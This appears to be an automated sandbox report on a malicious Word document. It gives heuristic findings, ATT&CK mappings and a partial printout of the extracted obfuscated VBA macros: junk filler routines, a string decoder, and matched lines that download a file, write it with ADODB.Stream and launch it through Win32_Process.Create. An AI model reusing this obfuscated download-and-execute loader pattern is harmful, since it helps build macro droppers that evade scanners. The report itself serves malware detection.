MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an Office document containing obfuscated VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP source and saves it to disk, likely to execute a second-stage payload. The 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' heuristic further confirms the presence of an obfuscated auto-executing loader. The Document_Open macro is present, suggesting automatic execution upon opening the document.
Heuristics 10
- VBA project inside OOXML [medium] OOXML_VBA (7 related findings)
  Document contains a VBA project — VBA macros present
- VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: otBMPK = lFYYzY.responseBody
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: GetObject(IRkNkGaVQ("w00i23n23m80g 5m t 4s63: ")).Get(eXvBiXsMW("W 6i 4n 3 328 _4 P73r2 o97c95e64s37s 0")).Create hFVdI, Null, Null, NTcKCPer
- CreateObject call [high] OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script: Set CDZUFyT = CreateObject(IRkNkGaVQ("A0 D86O92D2 B63.73S30t17r6 e 3a31m96"))
- GetObject call [high] OLE_VBA_GETOBJ
  GetObject call
  Matched line in script: GetObject(IRkNkGaVQ("w00i23n23m80g 5m t 4s63: ")).Get(eXvBiXsMW("W 6i 4n 3 328 _4 P73r2 o97c95e64s37s 0")).Create hFVdI, Null, Null, NTcKCPer
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script: Private Sub Document_Open()
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script: KgrRUs = Replace(eXvBiXsMW(KgrRUs), "ymjYnwDHjZ", Environ(IRkNkGaVQ("A16l l40U06s44e2 r 1s9 P 1r 5o2 f21i 1l 9e52")))
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 120679 bytes |

SHA-256: ed4e042e0d8f7ae6b0b448fcb5027e31ce3d5e1236962bdde17a4047956d8374
Detection
ClamAV: No threats found
Obfuscation or payload: likely
503 of 831 identifiers look randomly generated (e.g. 'UCpEJzvFosSLsXXmOGsP'); 40 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
CoYndsNcajfA = Left(698143927, 4)
qwHslJuRI = LTrim(16003172)
tkbyI = Left(4237056300#, 2)
KaQXTWKZpoJb = Right(2057980740928#, 2)
GPEPK = Left(441403243394314#, 2)
DwnpOKVNxQST = Space(19)
WgqfTITOHxn = Left(3842328, 3)
lFeAHsjz = RTrim(19916)
pbCXawm "vjJIrxW", "AVvGSBw", "ageTYJxIA", "yoVnpNzsk", "SOLsCqqoA", "KKVBeiU", "DmZbTJBQbZ"
While PBTMia < 3
While nHYPCR < 3
KMFjiVDKrZ = Space(1)
RTbuBw = StrReverse(865794696084023#)
zHufIggwI = 9 + 90 + 90 + 29 + 4 + 37
nHYPCR = nHYPCR + 3
Wend
GPEPK = Right(55329672, 2)
QhYkIS = Left(713165409378728#, 5)
KaQXTWKZpoJb = 77 - 69 - 15 - 80 - 48
ksEESrvQ = StrReverse(87652)
NMBjfWDGCD = RTrim(4322203920044#)
PBTMia = PBTMia + 1
Wend
tkbyI = StrReverse(73067)
kEbLvCjbr = Right(610839240289256#, 5)
kEbLvCjbr = 18 + 22
zHufIggwI = 90 - 82
LXvRKEfTW = RTrim(87607)
NMBjfWDGCD = 22 - 77 - 87 - 78 - 76
UvMzrbZJsmA = Left(27728284, 4)
For xHNvWx = 0 To 4
While JAchms < 1
BWPjymYu = LTrim(60704)
LEBseY = RTrim(514266)
JAchms = JAchms + 2
Wend
KhiQaip = Space(2)
WgqfTITOHxn = Left(68471053844#, 5)
zGmoD = 11 - 95
Next xHNvWx
CoYndsNcajfA = LTrim(39901599423877#)
End Sub
Attribute VB_Name = "Module1"
Function nrIWgg(vijhNt As Boolean, bIEJQQ As Boolean, DujlGq As Integer, FXNojqo As String, pMKxRH As String) As String
BWPjymYu = 70 + 93 + 10
YpNSadIIwrU = 72 - 34 - 10 - 73 - 94 - 88
zGmoD = 36 + 41 + 9 + 50
BQwPso = Right(4749105434974#, 3)
lFeAHsjz = UCase(6187)
qwHslJuRI = 99 - 97 - 35
BQwPso = Space(15)
sAiYhISSkXX = UCase(98974939668120#)
zGmoD = Space(6)
qwHslJuRI = UCase(476180434)
sAiYhISSkXX = Space(7)
While BaIbcL < 4
GPEPK = UCase(8747253639#)
QhYkIS = UCase(69243843573075#)
YpNSadIIwrU = UCase(424688427026167#)
KhiQaip = Left(2862917, 4)
BaIbcL = BaIbcL + 2
Wend
For QESYMd = 0 To 5
ksEESrvQ = Left(9373926, 3)
KhiQaip = Right(143913707808#, 3)
Rrqksfcb = StrReverse(479044431)
Next QESYMd
bIBcHTLDIwb = RTrim(20479881)
cJyCAeL = StrReverse(802317258392#)
For pGYJLl = 0 To 8
BWPjymYu = UCase(675189624)
sBqPr = 9 - 79
YpNSadIIwrU = Right(38057734051431#, 5)
KhiQaip = Space(1)
YpNSadIIwrU = StrReverse(3754809039#)
Next pGYJLl
nrIWgg = "XEudebBuQdyAteuIIv"
End Function
Sub tnuxCH(fqWTUZ As Double, nwminDD As Boolean, asYRYG As Boolean, YEFPzvv As Double)
cJyCAeL = RTrim(75135)
KMFjiVDKrZ = StrReverse(9379546)
cJyCAeL = RTrim(753887043)
zHufIggwI = Right(98400, 3)
NMBjfWDGCD = 44 - 26 - 56 - 37 - 55 - 44
WgqfTITOHxn = RTrim(86757)
lFeAHsjz = Left(686585, 3)
KhiQaip = Left(11640, 3)
DwnpOKVNxQST = UCase(242799)
UvMzrbZJsmA = UCase(12155693813#)
zGmoD = 100 - 50 - 25 - 60 - 82
sAiYhISSkXX = Left(3458792320#, 5)
BQwPso = LTrim(170762)
End Sub
Sub wbJLRz(PjOdDVG As Integer, YLvtoA As String)
YpNSadIIwrU = 14 + 12 + 43 + 87 + 42
YpNSadIIwrU = Left(36369044086#, 4)
Rrqksfcb = Space(19)
YpNSadIIwrU = Left(77040, 3)
BQwPso = Left(335129501020#, 4)
cJyCAeL = LTrim(8581872779#)
sAiYhISSkXX = 19 - 13 - 31 - 55
KaQXTWKZpoJb = StrReverse(9638315179653#)
ksEESrvQ = UCase(2952169653#)
LEBseY = StrReverse(686299103541#)
KaQXTWKZpoJb = LTrim(5312246291#)
KhiQaip = 83 + 96 + 1 + 34
NMBjfWDGCD = RTrim(2634703)
BQwPso = Space(1)
End Sub
Attribute VB_Name = "Module2"
Sub XrNcuC(kSuyyg As String, HYydwJW As Boolean, EPTdRV As String, HfYdaB As Double)
KhiQaip = StrReverse(24811296)
YpNSadIIwrU = Space(1)
UvMzrbZJsmA = RTrim(163558522703#)
For lJHTht = 0 To 5
lFeAHsjz = RTrim(33789319233173#)
KMFjiVDKrZ = Right(327433604632993#, 3)
WgqfTITOHxn = 93 - 84
qwHslJuRI = LTrim(90103823586#)
Next lJHTht
bIBcHTLDIwb = Right(70043678414#, 3)
RTbuBw = Right(2691132779277#, 5)
sBqPr = StrReverse(55452651659#)
jaYzEsLT = Right(46865, 5)
sAiYhISSkXX = 92 - 32
QhYkIS = 64 + 24
BQwPso = 82 - 21 - 85 - 64
zHufIggwI = Left(976021787, 5)
kEbLvCjbr = 5 - 91 - 74 - 54 - 49
NMBjfWDGCD = Right(1465105874319#, 5)
KaQXTWKZpoJb = UCase(254441617030#)
sBqPr = UCase(124860823894325#)
DwnpOKVNxQST = Left(366675, 4)
End Sub
Sub nagbfz(vazrsHY As Integer, weoTlyg As Double, rzqXzgo As Double, sGxfdb As Integer, qxEsAqb As Double)
Rrqksfcb = RTrim(620778127957#)
YpNSadIIwrU = Right(791877713829477#, 5)
kEbLvCjbr = StrReverse(574218539)
Rrqksfcb = StrReverse(31875724713#)
lqWjUyQs = 18 - 49 - 63 - 96 - 51 - 61
LXvRKEfTW = 60 - 73 - 6 - 25 - 27 - 63
YpNSadIIwrU = UCase(193211946)
bIBcHTLDIwb = RTrim(868321977)
YpNSadIIwrU = 27 - 78 - 46
KMFjiVDKrZ = StrReverse(209299)
Rrqksfcb = Right(970593760, 2)
NMBjfWDGCD = 84 + 73 + 83 + 6
YpNSadIIwrU = 32 + 100 + 39
YpNSadIIwrU = RTrim(2253744428258#)
LEBseY = 4 - 9 - 41 - 71 - 16 - 88
qwHslJuRI = LTrim(32363)
For WawurO = 0 To 5
BQwPso = 61 + 26 + 68
lqWjUyQs = Right(6225438943060#, 4)
Next WawurO
Rrqksfcb = Right(4372904, 2)
sBqPr = LTrim(70510353)
End Sub
Sub StmeGM(TVduFo As Boolean, gJgzFce As Boolean)
cJyCAeL = 81 - 59 - 44 - 10 - 61 - 86
lqWjUyQs = UCase(8969433671930#)
For XSoqZs = 0 To 10
DwnpOKVNxQST = Right(66135, 4)
jaYzEsLT = StrReverse(6426221)
LEBseY = RTrim(1041171338073#)
NMBjfWDGCD = Right(31950123874865#, 5)
Next XSoqZs
BWPjymYu = Right(1529156392305#, 4)
KhiQaip = StrReverse(72072)
BWPjymYu = UCase(407729462278258#)
bIBcHTLDIwb = RTrim(55283)
KhiQaip = Space(14)
sAiYhISSkXX = LTrim(2531186)
Rrqksfcb = Left(46885716646#, 2)
BWPjymYu = UCase(3528378)
KaQXTWKZpoJb = StrReverse(3334779121#)
KMFjiVDKrZ = StrReverse(315722272)
UvMzrbZJsmA = UCase(77787666955886#)
GPEPK = UCase(592725733640#)
End Sub
Attribute VB_Name = "Module3"
Function NghmjG(BDuekoF As Boolean, wigrpv As String, pmXNZW As Boolean, qyPCMGj As Integer) As String
KaQXTWKZpoJb = 29 + 36 + 55
UvMzrbZJsmA = 17 + 54 + 38 + 94 + 41 + 48
RTbuBw = UCase(967145)
For sVWjoo = 0 To 8
bIBcHTLDIwb = Left(146238726178#, 4)
jaYzEsLT = 70 + 54 + 24
DwnpOKVNxQST = RTrim(502133252415#)
sAiYhISSkXX = LTrim(886106)
RTbuBw = 4 - 98 - 77
Next sVWjoo
zHufIggwI = 62 + 3 + 70 + 94 + 92 + 25
ksEESrvQ = UCase(14097)
RTbuBw = StrReverse(51782)
zGmoD = RTrim(641735026018#)
For vQZFUh = 0 To 6
kEbLvCjbr = 68 - 70
BWPjymYu = Left(7824797113#, 4)
DwnpOKVNxQST = 74 + 7 + 74 + 14
QhYkIS = StrReverse(128271032192#)
Next vQZFUh
cJyCAeL = 54 - 95 - 30 - 85 - 88 - 2
KMFjiVDKrZ = 76 + 26
QoJHB = StrReverse(45180430)
YpNSadIIwrU = StrReverse(71850508)
KMFjiVDKrZ = Left(5992599, 3)
tkbyI = 98 - 58 - 80 - 85 - 5
UvMzrbZJsmA = Left(627055291267130#, 3)
zHufIggwI = Left(8569253, 3)
NghmjG = "dOjXsqhZAgHPYPIaQKu"
End Function
Sub UujKnq(mSXEuEJ As Boolean, qgtTeq As Boolean, ncxoyX As Integer)
BQwPso = Right(7362023, 5)
Rrqksfcb = UCase(48698266148#)
KMFjiVDKrZ = Right(549886156, 5)
LEBseY = 92 + 35 + 70 + 59
zGmoD = UCase(9339841884#)
BWPjymYu = Right(343581138535#, 5)
NMBjfWDGCD = Space(20)
Rrqksfcb = RTrim(314343004)
KMFjiVDKrZ = LTrim(480466195455#)
QhYkIS = 40 + 98 + 80 + 86 + 90
For NTXHzK = 0 To 5
For gmnGxy = 0 To 7
KMFjiVDKrZ = LTrim(15688464795858#)
BQwPso = LTrim(3336628)
NMBjfWDGCD = StrReverse(49056523803510#)
Next gmnGxy
KhiQaip = Right(157032471279824#, 2)
DwnpOKVNxQST = Space(19)
sBqPr = Space(16)
LXvRKEfTW = 1 + 28
Next NTXHzK
bIBcHTLDIwb = 20 + 17 + 29 + 42 + 18 + 27
CoYndsNcajfA = StrReverse(96432)
YpNSadIIwrU = Left(8705358, 4)
bIBcHTLDIwb = UCase(836106759043#)
jaYzEsLT = 20 - 61 - 92 - 13 - 0
End Sub
Function ZJIDbp(PEykXHO As String, YqZpuG As Boolean) As String
QhYkIS = 6 - 53 - 8 - 4 - 85
zHufIggwI = UCase(4318239713#)
BQwPso = LTrim(70111650802222#)
KaQXTWKZpoJb = Left(26465267635575#, 2)
zHufIggwI = RTrim(549817087558214#)
Rrqksfcb = Space(10)
ksEESrvQ = 56 - 12 - 48 - 39
sAiYhISSkXX = Space(16)
DwnpOKVNxQST = Left(410603489, 4)
zGmoD = 76 - 53 - 7
For MOpUje = 0 To 5
UvMzrbZJsmA = Space(1)
qwHslJuRI = 23 + 26 + 67 + 4 + 87
NMBjfWDGCD = Space(11)
Next MOpUje
QoJHB = Space(17)
For ExMiTl = 0 To 9
zHufIggwI = UCase(94244)
KaQXTWKZpoJb = Space(1)
YpNSadIIwrU = Right(33256168, 4)
zHufIggwI = Right(8523096, 3)
Next ExMiTl
DwnpOKVNxQST = RTrim(48411032)
sBqPr = UCase(35288)
ksEESrvQ = Space(1)
jaYzEsLT = 65 - 53
BQwPso = 89 - 95 - 95 - 11 - 7 - 97
ZJIDbp = "kFxEwAhYRdNhaoPDPyXt"
End Function
Function rnqnZp(wdgTPrk As String, LAVkBgK As Double, MZjrEX As Boolean, pQwYlYA As String, qxgXOpu As Boolean) As String
UvMzrbZJsmA = Left(7357082, 5)
GPEPK = RTrim(4327041741569#)
BWPjymYu = Left(283195168101247#, 3)
jaYzEsLT = StrReverse(29347)
RTbuBw = StrReverse(792094666241#)
For fCdRmF = 0 To 5
For ZCsTHH = 0 To 8
YpNSadIIwrU = 9 - 27 - 63 - 71 - 60 - 2
BQwPso = 58 - 8 - 71 - 21
tkbyI = RTrim(2968765690#)
zHufIggwI = Right(830354034855070#, 4)
Next ZCsTHH
Rrqksfcb = 39 - 36 - 29
KaQXTWKZpoJb = 35 - 20 - 53 - 3
BQwPso = StrReverse(9971144858#)
QoJHB = LTrim(24062)
cJyCAeL = RTrim(160001603)
Next fCdRmF
For VTqXBb = 0 To 3
For ygJkor = 0 To 9
kEbLvCjbr = Left(978880941020577#, 2)
WgqfTITOHxn = Left(23150, 5)
zGmoD = Space(12)
UvMzrbZJsmA = LTrim(378262)
bIBcHTLDIwb = StrReverse(8800286)
Next ygJkor
tkbyI = Right(998084, 4)
jaYzEsLT = LTrim(7806715644#)
Next VTqXBb
BWPjymYu = Space(16)
QoJHB = 39 + 40 + 49 + 81 + 20
GPEPK = Space(18)
LEBseY = LTrim(810212888632#)
sAiYhISSkXX = Left(4498935, 2)
rnqnZp = "bxYTUYhTUaYQqJNX"
End Function
Attribute VB_Name = "Module4"
Sub xlvDfj(BzuaMos As Boolean, QUXGvy As String, OuKBpNo As Double, lCywaZ As String, qupaIR As String)
NMBjfWDGCD = UCase(816610659806120#)
lqWjUyQs = 80 + 92
cJyCAeL = RTrim(900637479689#)
WgqfTITOHxn = Left(5991560999#, 4)
zGmoD = RTrim(942196712071#)
For SIQlyU = 0 To 5
sBqPr = Right(975640679, 2)
sBqPr = StrReverse(3414450046#)
Rrqksfcb = Left(827194, 2)
DwnpOKVNxQST = RTrim(23686437756#)
Next SIQlyU
DwnpOKVNxQST = LTrim(39602)
bIBcHTLDIwb = Left(306507, 2)
GPEPK = UCase(4563036069382#)
DwnpOKVNxQST = LTrim(18770)
WgqfTITOHxn = RTrim(122222396)
jaYzEsLT = Left(889066, 2)
While sExOVe < 2
KaQXTWKZpoJb = Space(16)
kEbLvCjbr = Space(8)
QoJHB = StrReverse(439028795)
lqWjUyQs = LTrim(7981249)
QhYkIS = UCase(71689)
sExOVe = sExOVe + 3
Wend
qwHslJuRI = UCase(2100418031)
DwnpOKVNxQST = Space(14)
zHufIggwI = 36 + 88 + 47 + 78 + 62
End Sub
Function jOdUHB(sMGqWg As String) As String
qwHslJuRI = RTrim(13252)
WgqfTITOHxn = Right(561217791, 2)
LXvRKEfTW = UCase(49192379155#)
LEBseY = StrReverse(3298412261#)
LXvRKEfTW = Left(936720480, 2)
While LtyNyV < 4
While seQOte < 5
qwHslJuRI = Right(53233495445959#, 3)
YpNSadIIwrU = StrReverse(1797845775)
zHufIggwI = UCase(24225979072948#)
seQOte = seQOte + 2
Wend
zHufIggwI = LTrim(6335795718323#)
UvMzrbZJsmA = UCase(51073745)
cJyCAeL = UCase(89797659483#)
KMFjiVDKrZ = Space(2)
Rrqksfcb = 94 - 77 - 69 - 40 - 68
LtyNyV = LtyNyV + 2
Wend
ksEESrvQ = UCase(57628156164678#)
GPEPK = UCase(641974967269208#)
YpNSadIIwrU = Space(13)
sAiYhISSkXX = UCase(14801760)
While iDrtlu < 5
lFeAHsjz = 81 + 42 + 57 + 14
UvMzrbZJsmA = 75 - 46
RTbuBw = 84 + 93 + 50 + 17 + 30 + 50
KaQXTWKZpoJb = 93 + 79
iDrtlu = iDrtlu + 1
Wend
LEBseY = Space(1)
YpNSadIIwrU = Left(7352171456#, 5)
jOdUHB = "SuDXyEMIxVukjSI"
End Function
Function nUXVdV(NHmQxF As String, zeiTgtB As String, RxsdDRX As String, MaAcCD As Boolean, LTOnLS As Integer) As String
While XsJwbC < 2
GPEPK = LTrim(6162417250#)
lFeAHsjz = 74 - 61 - 67
XsJwbC = XsJwbC + 2
Wend
CoYndsNcajfA = 37 - 8
LEBseY = StrReverse(982330)
YpNSadIIwrU = StrReverse(7460149241860#)
KMFjiVDKrZ = StrReverse(3797826315#)
lqWjUyQs = Right(4631265068330#, 3)
For PqCQRP = 0 To 5
While bcXJNk < 1
KMFjiVDKrZ = 31 - 82 - 13 - 17 - 33 - 6
QhYkIS = 13 + 79 + 31 + 91 + 70 + 81
YpNSadIIwrU = Left(719545, 5)
LXvRKEfTW = Space(13)
bcXJNk = bcXJNk + 1
Wend
DwnpOKVNxQST = 45 - 68 - 37 - 64
KMFjiVDKrZ = 45 + 27 + 3 + 57 + 23 + 100
BQwPso = LTrim(325769120)
zGmoD = StrReverse(5209742)
bIBcHTLDIwb = StrReverse(396643447)
Next PqCQRP
Rrqksfcb = LTrim(10818789)
NMBjfWDGCD = Space(5)
lqWjUyQs = RTrim(8616018299904#)
KaQXTWKZpoJb = Right(6917153004#, 3)
tkbyI = RTrim(402423)
While NZazqB < 2
For aCviqP = 0 To 6
Rrqksfcb = StrReverse(20532739)
ksEESrvQ = RTrim(19311374333724#)
CoYndsNcajfA = RTrim(245024)
QoJHB = LTrim(424859233477#)
Rrqksfcb = Space(5)
Next aCviqP
QoJHB = Right(983559171723#, 3)
DwnpOKVNxQST = RTrim(4458010287577#)
zHufIggwI = RTrim(81608274)
BWPjymYu = Left(50475912, 5)
NZazqB = NZazqB + 1
Wend
QhYkIS = LTrim(703822223279#)
lFeAHsjz = 77 - 27
nUXVdV = "UzxYqwYMjglKgGX"
End Function
Function SmUPRh(BTLnqb As Integer, EdefaUp As String, wEIYLx As String, IANRic As Boolean) As String
kEbLvCjbr = LTrim(24709374168050#)
CoYndsNcajfA = Space(13)
DwnpOKVNxQST = 92 + 76 + 78 + 81
ksEESrvQ = LTrim(732243369672393#)
LEBseY = 26 - 9 - 40 - 46
LEBseY = 40 - 25 - 58 - 64 - 2
ksEESrvQ = Space(4)
While jbzRbm < 5
sBqPr = RTrim(5389894664100#)
BQwPso = Left(51485977689824#, 2)
zGmoD = 40 + 42 + 1
RTbuBw = LTrim(999401)
jbzRbm = jbzRbm + 3
Wend
jaYzEsLT = StrReverse(693765567786351#)
DwnpOKVNxQST = UCase(98607776)
lFeAHsjz = Space(6)
KMFjiVDKrZ = Left(731811354, 5)
lqWjUyQs = 4 - 29 - 79 - 43 - 31 - 8
ksEESrvQ = 86 - 33 - 12
zGmoD = RTrim(95080773453925#)
DwnpOKVNxQST = StrReverse(10336436758#)
SmUPRh = "UfMippUmiiQHFRNGgzp"
End Function
Attribute VB_Name = "Module5"
Function ImqGBW(lYHPee As Integer, WcKkMX As Double, qQgHxG As String, PqtIKZ As String, arOpmu As Boolean) As String
For FTzKRz = 0 To 7
zGmoD = StrReverse(1458987)
qwHslJuRI = RTrim(84741018713#)
sBqPr = Space(3)
DwnpOKVNxQST = Left(30825065054#, 4)
Next FTzKRz
UvMzrbZJsmA = Right(157296017826443#, 5)
KhiQaip = RTrim(272547216283#)
KMFjiVDKrZ = LTrim(85853)
tkbyI = UCase(109301436)
KhiQaip = Left(1324991181701#, 2)
DwnpOKVNxQST = 50 - 24 - 62 - 36
DwnpOKVNxQST = LTrim(54740)
QhYkIS = Left(162757679906#, 4)
lqWjUyQs = RTrim(647843)
jaYzEsLT = UCase(665816805333160#)
KaQXTWKZpoJb = UCase(1084535509)
ksEESrvQ = UCase(4744161849#)
zHufIggwI = 94 - 41 - 98 - 90 - 23
LXvRKEfTW = LTrim(7918995791#)
bIBcHTLDIwb = UCase(5967625)
ImqGBW = "ixMiSVKjdCvJuLJyTG"
End Function
Attribute VB_Name = "Module6"
Function eXvBiXsMW(SlEVaZ As String) As String
sBqPr = Right(593079011, 4)
Dim BAHTRTiF As Integer
sBqPr = Left(4631459970#, 4)
Dim RmSByb(824) As Byte
Dim NlNQXbU As String
BWPjymYu = 30 - 80 - 3 - 11
Dim PogITv() As Byte
jaYzEsLT = Left(263590761, 3)
BAHTRTiF = 0
LEBseY = 12 - 61 - 54 - 24 - 19 - 82
PogITv = StrConv(SlEVaZ, vbFromUnicode)
sAiYhISSkXX = Right(32815883558#, 4)
For AiqQYTKo = 0 To UBound(PogITv) - 1
BWPjymYu = Space(17)
If (AiqQYTKo Mod 3 = 0) Then
jaYzEsLT = StrReverse(646166750)
RmSByb(BAHTRTiF) = PogITv(AiqQYTKo)
RTbuBw = StrReverse(780224119425#)
BAHTRTiF = BAHTRTiF + 1
UvMzrbZJsmA = Right(678380803199#, 4)
End If
Next AiqQYTKo
bIBcHTLDIwb = LTrim(45388485718#)
eXvBiXsMW = StrConv(RmSByb, vbUnicode)
LXvRKEfTW = UCase(3780814)
End Function
Attribute VB_Name = "Module7"
Sub lOvYgV(GeHHQVw As Integer, wNasmj As Integer, aPbmwqE As Integer, pmOGOHy As String)
YpNSadIIwrU = 74 + 75 + 56
For GsyLRX = 0 To 9
BWPjymYu = RTrim(76923)
UvMzrbZJsmA = 47 - 25 - 26
cJyCAeL = Right(8754471, 2)
YpNSadIIwrU = Left(83737, 5)
sBqPr = Right(5310016, 2)
Next GsyLRX
sAiYhISSkXX = UCase(268817326)
RTbuBw = 12 - 49 - 97 - 18 - 95
DwnpOKVNxQST = UCase(61722145929#)
Rrqksfcb = 55 - 74
NMBjfWDGCD = Left(278111381, 4)
For HTQgPJ = 0 To 5
zGmoD = LTrim(6822250)
NMBjfWDGCD = 2 - 65 - 18 - 69 - 68 - 43
UvMzrbZJsmA = RTrim(1316808130)
QoJHB = 40 - 95 - 67
Next HTQgPJ
KhiQaip = StrReverse(895947751413#)
GPEPK = Right(895813235882#, 2)
kEbLvCjbr = UCase(1172849)
sAiYhISSkXX = Space(5)
QhYkIS = RTrim(53325797526300#)
bIBcHTLDIwb = 18 - 42 - 68 - 61 - 6
lFeAHsjz = Left(46279928, 2)
End Sub
Function XRBsBn(SchjIdC As Integer, ORlEJao As Integer, XVIqQIy As Integer) As String
zGmoD = StrReverse(772020061583#)
QoJHB = StrReverse(7235360347023#)
sBqPr = 5 - 31
KMFjiVDKrZ = 68 + 84 + 38 + 22 + 78 + 29
jaYzEsLT = RTrim(4727534591308#)
WgqfTITOHxn = StrReverse(904663713)
YpNSadIIwrU = Left(707052, 4)
qwHslJuRI = LTrim(481325648552393#)
lqWjUyQs = 61 + 74 + 3
While NgToGd < 2
While QOqebc < 4
YpNSadIIwrU = RTrim(696284497)
QoJHB = StrReverse(962308)
jaYzEsLT = LTrim(98614996754#)
UvMzrbZJsmA = 70 - 8 - 56 - 18 - 97
DwnpOKVNxQST = 24 - 30 - 78
QOqebc = QOqebc + 1
Wend
zHufIggwI = LTrim(1932029243)
NMBjfWDGCD = 82 + 31 + 22 + 80 + 53 + 86
NgToGd = NgToGd + 3
Wend
BWPjymYu = 20 - 31 - 49 - 82 - 46
qwHslJuRI = UCase(58114)
CoYndsNcajfA = Right(4232934, 4)
WgqfTITOHxn = Left(130896942896#, 4)
XRBsBn = "JLFFplmCcqEkpyd"
End Function
Attribute VB_Name = "Module8"
Function YgBVdD(LYDcshz As Boolean) As String
CoYndsNcajfA = UCase(376745794)
bIBcHTLDIwb = Space(9)
NMBjfWDGCD = Left(52218041, 4)
GPEPK = Left(964108, 2)
WgqfTITOHxn = UCase(7432170549485#)
zHufIggwI = LTrim(25021626678804#)
tkbyI = Right(43269101301657#, 5)
Rrqksfcb = Space(6)
KaQXTWKZpoJb = Right(4187885, 3)
Rrqksfcb = 51 + 55 + 35 + 26 + 0
Rrqksfcb = Left(65851380075011#, 3)
qwHslJuRI = 50 - 23
UvMzrbZJsmA = 8 + 64
jaYzEsLT = 63 + 78 + 4 + 64 + 98 + 13
BQwPso = LTrim(7648519554#)
YgBVdD = "yAQoIMzZhKRGkDY"
End Function
Attribute VB_Name = "Module9"
Sub laeLBJ(HtSRiI As Boolean, czhfjmc As String, BBFXrx As Boolean, oixLhIp As Double)
cJyCAeL = Space(3)
QoJHB = Right(649778586770#, 2)
cJyCAeL = 13 - 52 - 40 - 47
WgqfTITOHxn = 6 - 20 - 10 - 31
sBqPr = 72 + 58 + 14 + 75 + 42
BQwPso = 49 - 54 - 32 - 80 - 56
LXvRKEfTW = LTrim(98846050)
kEbLvCjbr = LTrim(898622325178#)
QhYkIS = UCase(1853922329)
DwnpOKVNxQST = RTrim(4153447616#)
zGmoD = UCase(973240280416061#)
While uuLuaH < 5
sBqPr = 31 + 99 + 10 + 66 + 25
sBqPr = LTrim(10735846)
LXvRKEfTW = Space(20)
LXvRKEfTW = 65 + 5 + 70
uuLuaH = uuLuaH + 2
Wend
zHufIggwI = RTrim(4409201497#)
YpNSadIIwrU = LTrim(898463256416#)
LEBseY = 64 + 0 + 74
KhiQaip = Right(4039446137#, 4)
KhiQaip = LTrim(1679)
CoYndsNcajfA = Right(661730740, 3)
End Sub
Attribute VB_Name = "Module10"
Function UlikBs(YkSookk As Double, hqyJUAM As String) As String
DwnpOKVNxQST = 12 - 85
cJyCAeL = StrReverse(64091592)
zGmoD = LTrim(777038)
zHufIggwI = Right(9679312438#, 3)
For zkEqrI = 0 To 6
RTbuBw = Space(5)
qwHslJuRI = Left(65727783532402#, 3)
Next zkEqrI
kEbLvCjbr = 98 - 70 - 21 - 2
sAiYhISSkXX = RTrim(163068276582511#)
bIBcHTLDIwb = RTrim(5836951196#)
NMBjfWDGCD = RTrim(677912355141#)
CoYndsNcajfA = StrReverse(604294978264434#)
ksEESrvQ = Space(7)
While SSWvFn < 5
QoJHB = UCase(37610286)
KMFjiVDKrZ = LTrim(9095)
BQwPso = LTrim(106792978)
qwHslJuRI = LTrim(57487662)
SSWvFn = SSWvFn + 1
Wend
WgqfTITOHxn = StrReverse(766082943920918#)
BWPjymYu = LTrim(81945544)
UlikBs = "oLFlDWkEzwCsHeC"
End Function
Attribute VB_Name = "Module11"
Function mKUrwC(kEPIZSB As String) As String
For AraooU = 0 To 10
kEbLvCjbr = UCase(109925272)
YpNSadIIwrU = RTrim(9969771)
zGmoD = 95 + 48 + 4 + 11 + 35
KhiQaip = 1 - 37
Next AraooU
GPEPK = LTrim(8443349898118#)
kEbLvCjbr = LTrim(424150775665494#)
YpNSadIIwrU = RTrim(680458)
kEbLvCjbr = Right(186829, 2)
zGmoD = Left(1716941, 4)
LXvRKEfTW = Space(1)
KhiQaip = Left(4707359, 2)
WgqfTITOHxn = Space(18)
jaYzEsLT = 99 - 95 - 13
jaYzEsLT = UCase(5106028922#)
QoJHB = StrReverse(86198917)
bIBcHTLDIwb = Left(846745851577#, 3)
sBqPr = StrReverse(374341045695168#)
ksEESrvQ = LTrim(24250)
mKUrwC = "VDVjxYSdyIuBhXdD"
End Function
Function fYJGUC(VlpOZb As String, ZjSYwOl As Boolean, CFNtwsg As Double, QNEJDdZ As String) As String
ksEESrvQ = StrReverse(398505989327622#)
QoJHB = Space(20)
KMFjiVDKrZ = Space(9)
qwHslJuRI = RTrim(9544979203855#)
ksEESrvQ = UCase(911525055969730#)
NMBjfWDGCD = RTrim(7980811883264#)
